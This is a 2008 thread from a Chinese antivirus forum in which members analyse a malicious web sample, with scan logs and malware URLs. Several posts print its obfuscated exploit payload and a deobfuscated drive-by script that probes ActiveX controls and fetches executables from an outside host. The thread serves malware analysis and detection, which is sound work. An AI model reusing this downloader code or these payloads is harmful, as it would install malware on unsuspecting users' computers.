查看: 3596|回复: 13
收起左侧

[已鉴定] 一个搜索的。。。

 关闭 [复制链接]
znwn20xs
头像被屏蔽
发表于 2008-1-18 18:47:27 | 显示全部楼层 |阅读模式
hxxp://ad.clx666.com/

内存跑到 1GB多

样本.rar

6.64 KB, 下载次数: 119

Graybird
发表于 2008-1-18 18:49:14 | 显示全部楼层
Starting the file scan:

Begin scan in 'E:\��.rar'
E:\��.rar
  [0] Archive type: RAR
  --> Ñù±¾\324485933888.tmp
      [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Agent.cge
  --> Ñù±¾\4056125583408.tmp
      [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Agent.cge
  --> Ñù±¾\nb[1].htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Agent.cge
  --> Ñù±¾\nc[1].htm
      [DETECTION] Contains detection pattern of the exploits EXP/RealPlr.AF
      [INFO]      The file was deleted!
qigang
发表于 2008-1-18 19:17:15 | 显示全部楼层

5/2

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Hack.Exploit.Script.Small.aq
病毒: Hack.Exploit.Script.JS.Agent.fh

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.27.42
傻猪猪米走鸡
发表于 2008-1-18 21:05:19 | 显示全部楼层
2008-1-18 21:04:23        Kernel        File  'D:\firefox download\样本\样本\nc[1].htm' was sent to ESET for analysis.       
2008-1-18 21:04:05        Kernel        File  'D:\firefox download\样本\样本\nb[1].htm' was sent to ESET for analysis.       
2008-1-18 21:03:49        Kernel        File  'D:\firefox download\样本\样本\324485933888.tmp' was sent to ESET for analysis.
醉一生爱妍
发表于 2008-1-18 21:45:58 | 显示全部楼层
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('80("\\57\\52\\0\\58\\69\\29\\39\\48\\10\\81\\28\\36\\20\\49\\28\\60\\10\\4\\28\\61\\77\\8\\78\\43\\44\\36\\44\\16\\29\\28\\49\\62\\29\\31\\6\\17\\78\\7\\36\\13\\14\\48\\6\\62\\45\\61\\28\\22\\59\\79\\10\\58\\28\\27\\69\\17\\28\\5\\44\\17\\14\\69\\36\\28\\28\\6\\35\\62\\45\\29\\36\\13\\59\\49\\9\\58\\44\\14\\49\\16\\1\\8\\35\\28\\10\\36\\77\\63\\20\\39\\45\\49\\65\\82\\28\\16\\65\\31\\6\\59\\84\\25\\52\\57\\15\\12\\21\\25\\13\\3\\1\\5\\4\\13\\40\\5\\13\\5\\1\\50\\51\\18\\15\\12\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\8\\2\\5\\1\\0\\50\\51\\15\\12\\19\\8\\5\\13\\10\\4\\8\\56\\4\\13\\17\\4\\6\\10\\75\\5\\13\\5\\1\\73\\15\\12\\5\\21\\50\\10\\4\\3\\25\\16\\0\\13\\1\\56\\3\\4\\4\\37\\5\\0\\56\\5\\13\\10\\0\\29\\31\\21\\50\\47\\31\\79\\47\\51\\75\\75\\55\\61\\51\\18\\15\\12\\11\\1\\2\\24\\18\\15\\12\\11\\11\\26\\6\\2\\40\\0\\73\\15\\12\\11\\11\\26\\6\\2\\40\\6\\10\\4\\75\\50\\10\\4\\3\\25\\16\\0\\13\\1\\56\\3\\2\\0\\6\\1\\0\\27\\17\\0\\16\\0\\13\\1\\50\\42\\4\\9\\22\\0\\3\\1\\42\\51\\51\\73\\15\\12\\11\\11\\6\\10\\4\\56\\7\\0\\1\\32\\1\\1\\2\\5\\9\\25\\1\\0\\50\\42\\3\\17\\6\\7\\7\\5\\10\\42\\54\\42\\3\\17\\7\\5\\10\\72\\68\\43\\71\\66\\67\\65\\65\\66\\55\\66\\65\\32\\63\\55\\61\\61\\43\\60\\55\\71\\70\\63\\32\\55\\60\\60\\67\\60\\64\\59\\67\\62\\71\\27\\63\\66\\42\\51\\73\\15\\12\\11\\11\\26\\6\\2\\40\\6\\7\\75\\6\\10\\4\\56\\3\\2\\0\\6\\1\\0\\4\\9\\22\\0\\3\\1\\50\\42\\32\\10\\4\\10\\9\\56\\35\\1\\2\\0\\6\\16\\42\\54\\42\\42\\51\\15\\12\\11\\19\\3\\6\\1\\3\\20\\50\\0\\51\\18\\15\\12\\11\\11\\15\\12\\11\\19\\73\\15\\12\\11\\21\\5\\13\\6\\17\\17\\24\\18\\15\\12\\11\\11\\26\\6\\2\\40\\0\\29\\14\\5\\2\\0\\7\\75\\13\\0\\8\\40\\43\\6\\1\\0\\50\\51\\73\\15\\12\\11\\11\\0\\29\\14\\5\\2\\0\\7\\56\\7\\0\\1\\39\\5\\16\\0\\50\\0\\29\\14\\5\\2\\0\\7\\56\\30\\0\\1\\39\\5\\16\\0\\50\\51\\53\\62\\64\\52\\66\\60\\52\\66\\60\\52\\61\\60\\60\\60\\51\\73\\15\\12\\11\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\3\\4\\4\\37\\5\\0\\75\\47\\5\\0\\14\\17\\75\\4\\2\\0\\2\\73\\14\\6\\1\\20\\75\\57\\73\\0\\29\\14\\5\\2\\0\\7\\75\\47\\53\\0\\29\\14\\5\\2\\0\\7\\56\\1\\4\\58\\45\\39\\35\\1\\2\\5\\13\\30\\50\\51\\73\\15\\12\\11\\11\\5\\21\\50\\0\\41\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\51\\18\\15\\12\\11\\11\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\8\\2\\5\\1\\0\\50\\42\\74\\7\\3\\2\\5\\14\\1\\40\\7\\2\\3\\75\\20\\1\\1\\14\\72\\23\\57\\23\\57\\8\\8\\8\\61\\56\\9\\37\\24\\0\\7\\56\\3\\4\\16\\23\\57\\8\\0\\9\\23\\57\\60\\61\\64\\56\\22\\7\\76\\74\\23\\57\\7\\3\\2\\5\\14\\1\\76\\42\\51\\15\\12\\11\\11\\19\\0\\17\\7\\0\\40\\18\\15\\12\\11\\11\\11\\1\\2\\24\\18\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\21\\73\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\7\\1\\4\\2\\16\\75\\13\\0\\8\\40\\32\\3\\1\\5\\26\\0\\48\\31\\9\\22\\0\\3\\1\\50\\42\\45\\38\\35\\56\\35\\1\\4\\2\\16\\38\\17\\6\\24\\0\\2\\42\\51\\15\\12\\11\\11\\11\\19\\3\\6\\1\\3\\20\\50\\21\\51\\18\\15\\12\\11\\11\\11\\11\\15\\12\\11\\11\\11\\19\\73\\15\\12\\11\\11\\11\\21\\5\\13\\6\\17\\17\\24\\18\\15\\12\\11\\11\\11\\11\\5\\21\\50\\21\\41\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\51\\18\\15\\12\\11\\11\\11\\11\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\8\\2\\5\\1\\0\\50\\42\\74\\7\\3\\2\\5\\14\\1\\40\\7\\2\\3\\75\\20\\1\\1\\14\\72\\23\\57\\23\\57\\8\\8\\8\\61\\56\\9\\37\\24\\0\\7\\56\\3\\4\\16\\23\\57\\8\\0\\9\\23\\57\\9\\21\\56\\22\\7\\76\\74\\23\\57\\7\\3\\2\\5\\14\\1\\76\\42\\51\\15\\12\\11\\11\\11\\11\\19\\15\\12\\11\\11\\11\\19\\1\\2\\24\\18\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\30\\73\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\14\\14\\7\\75\\13\\0\\8\\40\\32\\3\\1\\5\\26\\0\\48\\31\\9\\22\\0\\3\\1\\50\\42\\38\\31\\36\\27\\44\\38\\83\\32\\77\\27\\44\\56\\38\\4\\8\\0\\2\\38\\17\\6\\24\\0\\2\\67\\1\\2\\17\\56\\61\\42\\51\\15\\12\\11\\11\\11\\19\\3\\6\\1\\3\\20\\50\\30\\51\\18\\15\\12\\11\\11\\11\\11\\15\\12\\11\\11\\11\\19\\73\\15\\12\\11\\11\\11\\21\\5\\13\\6\\17\\17\\24\\18\\15\\12\\11\\11\\11\\11\\5\\21\\50\\30\\41\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\51\\18\\15\\12\\11\\11\\11\\11\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\8\\2\\5\\1\\0\\50\\42\\74\\7\\3\\2\\5\\14\\1\\40\\7\\2\\3\\75\\20\\1\\1\\14\\72\\23\\57\\23\\57\\8\\8\\8\\61\\56\\9\\37\\24\\0\\7\\56\\3\\4\\16\\23\\57\\8\\0\\9\\23\\57\\14\\14\\7\\56\\22\\7\\76\\74\\23\\57\\7\\3\\2\\5\\14\\1\\76\\42\\51\\15\\12\\11\\11\\11\\11\\19\\15\\12\\11\\11\\11\\19\\1\\2\\24\\18\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\20\\73\\15\\12\\11\\11\\11\\11\\26\\6\\2\\40\\4\\9\\22\\75\\13\\0\\8\\40\\32\\3\\1\\5\\26\\0\\48\\31\\9\\22\\0\\3\\1\\50\\42\\68\\6\\5\\10\\25\\68\\6\\2\\56\\39\\4\\4\\17\\42\\51\\15\\12\\11\\11\\11\\19\\3\\6\\1\\3\\20\\50\\20\\51\\18\\15\\12\\11\\11\\11\\11\\15\\12\\11\\11\\11\\19\\73\\15\\12\\11\\11\\11\\21\\5\\13\\6\\17\\17\\24\\18\\15\\12\\11\\11\\11\\11\\5\\21\\50\\20\\41\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\51\\18\\15\\12\\11\\11\\11\\11\\11\\4\\9\\22\\56\\43\\17\\4\\6\\10\\43\\35\\50\\42\\20\\1\\1\\14\\72\\57\\57\\13\\30\\25\\5\\22\\6\\17\\61\\56\\9\\37\\24\\0\\7\\56\\3\\4\\16\\57\\6\\10\\57\\6\\10\\56\\3\\6\\9\\42\\54\\42\\9\\10\\56\\0\\29\\0\\42\\54\\60\\51\\15\\12\\11\\11\\11\\11\\19\\15\\12\\11\\11\\11\\19\\5\\21\\50\\21\\75\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\46\\46\\30\\75\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\46\\46\\20\\75\\75\\42\\33\\4\\9\\22\\0\\3\\1\\40\\27\\2\\2\\4\\2\\34\\42\\51\\18\\15\\12\\11\\11\\11\\11\\10\\4\\3\\25\\16\\0\\13\\1\\56\\8\\2\\5\\1\\0\\50\\42\\74\\5\\21\\2\\6\\16\\0\\40\\8\\5\\10\\1\\20\\75\\47\\61\\60\\47\\40\\20\\0\\5\\30\\20\\1\\75\\47\\61\\60\\47\\40\\7\\2\\3\\75\\47\\20\\1\\1\\14\\72\\57\\57\\8\\8\\8\\61\\56\\9\\37\\24\\0\\7\\56\\3\\4\\16\\57\\8\\0\\9\\57\\8\\0\\9\\61\\56\\20\\1\\16\\47\\76\\74\\57\\5\\21\\2\\6\\16\\0\\76\\42\\51\\15\\12\\11\\11\\11\\19\\15\\12\\11\\11\\19\\15\\12\\11\\19\\15\\12\\19\\15\\12")',10,85,'145|164|162|143|157|151|141|163|167|142|144|||156|160||155|154|173|175|150|146|152|134|171|165|166|105|126|170|147|117|101|133|135|123|127|153|120|124||||104|122|115|||130|125|||||||||107|106||||||||103|102|121||||||||131|132|113|eval|116|110|114|112'.split('|'),0,{}))

这段代码明显用了REAL漏洞

这个都是
solcroft
发表于 2008-1-18 21:58:31 | 显示全部楼层
就先来这个,懒得一一跟踪了


  1. /*eGQxTXdNVWhUV0doV1YwZDRWRmxVU2xOalZsWnpXa2M1VjFKdGVEQlViRlpQWVVaS2MxWnFUbGRpUmtwSVdWY3hTMU5HVm5OaFJu*/
  2. function init(){
  3. document.write()
  4. }window.onload=init;
  5. if(document.cookie.indexOf('OK')==-1){
  6. try{
  7.   var e;
  8.   var ado=(document.createElement("object"));
  9.   ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  10.   var as=ado.createobject("Adodb.Stream","")
  11. }catch(e){
  12.   
  13. };
  14. finally{
  15.   var expires=new Date();
  16.   expires.setTime(expires.getTime()+24*60*60*1000);
  17.   document.cookie='iepl=orer;path=/;expires='+expires.toGMTString();
  18.   if(e!="[object Error]"){
  19.    document.write("<script src=http:\/\/www1.bkyes.com\/web\/014.js><\/script>")
  20.   }else {
  21.    try{
  22.     var f;
  23.     var storm=new ActiveXObject("MPS.StormPlayer")
  24.    }catch(f){
  25.    
  26.    };
  27.    finally{
  28.     if(f!="[object Error]"){
  29.      document.write("<script src=http:\/\/www1.bkyes.com\/web\/bf.js><\/script>")
  30.     }
  31.    }try{
  32.     var g;
  33.     var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
  34.    }catch(g){
  35.    
  36.    };
  37.    finally{
  38.     if(g!="[object Error]"){
  39.      document.write("<script src=http:\/\/www1.bkyes.com\/web\/pps.js><\/script>")
  40.     }
  41.    }try{
  42.     var h;
  43.     var obj=new ActiveXObject("BaiduBar.Tool")
  44.    }catch(h){
  45.    
  46.    };
  47.    finally{
  48.     if(h!="[object Error]"){
  49.      obj.DloadDS("http://nguijal1.bkyes.com/ad/ad.cab","bd.exe",0)
  50.     }
  51.    }if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){
  52.     document.write("<iframe width='10' height='10' src='http://www1.bkyes.com/web/web1.htm'></iframe>")
  53.    }
  54.   }
  55. }
  56. }

复制代码
qianwenxiang
发表于 2008-1-18 22:03:52 | 显示全部楼层
解密基本靠猜  还好 又是生成器弄的。。从http://nguijal1.bkyes.com/ad/ad.cab猜出来下面几个。。

http://nguijal1.bkyes.com/ad/014.exe
http://nguijal1.bkyes.com/ad/bf.exe
http://nguijal1.bkyes.com/ad/rl.exe
http://nguijal1.bkyes.com/ad/pps.exe
http://nguijal1.bkyes.com/ad/lz.exe

[ 本帖最后由 qianwenxiang 于 2008-1-18 22:05 编辑 ]
solcroft
发表于 2008-1-18 22:10:53 | 显示全部楼层

回复 7楼 qianwenxiang 的帖子

过不久就能用工具解密了
qianwenxiang
发表于 2008-1-18 22:26:50 | 显示全部楼层

回复 8楼 solcroft 的帖子

是那啥freshow吧~
zzh161
发表于 2008-1-18 23:47:35 | 显示全部楼层
前头才分析玩这个nb,nc


hxxp://w.hcden.com/nb.htm
   {hxxp://nguijal1.bkyes.com/ad/ad.cab  
    hxxp://nguijal1.bkyes.com/ad/pps.exe
    hxxp://nguijal1.bkyes.com/ad/bf.exe
    hxxp://nguijal1.bkyes.com/ad/014.exe
   }
hxxp://w.hcden.com/nc.htm   hxxp://nguijal1.bkyes.com/ad/rl.exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 17:42 , Processed in 0.135948 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表